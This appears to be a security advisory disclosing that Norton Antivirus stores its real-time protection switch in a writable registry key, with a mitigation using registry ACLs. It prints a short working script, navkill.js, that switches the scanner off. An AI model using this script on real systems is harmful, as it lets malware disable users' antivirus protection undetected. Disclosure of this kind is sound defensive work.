|
Brought to you by:
Suppliers of:
|
|
|
| |
Norton Antivirus has a real-time protection for scanning files. This real-time protection can be manually deactivated by right clicking the Norton icon at the systray and selecting the option "deactivate".
Running Applications such as application installers can deactivate this option, install, and execute a virus and active the scanner after installing.
The option whether the real-time protection is active is simply stored in the registry like other interesting keys for Antivirus scanning options.
This allows Virus and Trojan programs that are able to avoid initial detection to disable the antivirus prior to self-extracting themselves and infecting the computer. |
| |
Credit:
The information has been provided by Daniel Wischnewski.
|
| |
The registry key HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\LANDesk\VirusProtect6\ CurrentVersion\Storages\Filesystem\RealTimeScan controls whether the realtime protection has been enabled or not.
A malicious program could control the real-time protection by simply changing this registry key. A sample program to deactivate the real-time protection is shown here:
<---==============================--- navkill.js ---==============================--->
var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.RegWrite("HKLM\\SOFTWARE\\INTEL\\LANDesk\\VirusProtect6\\CurrentVersion\\Storages\\Filesystem\\RealTimeScan\\OnOff", 0, "REG_DWORD");
<---==============================--- navkill.js ---==============================--->
Solution:
Windows NT and 2000 users can deny access the mention registry key using the registry's ACL.
|
|
|
|
|
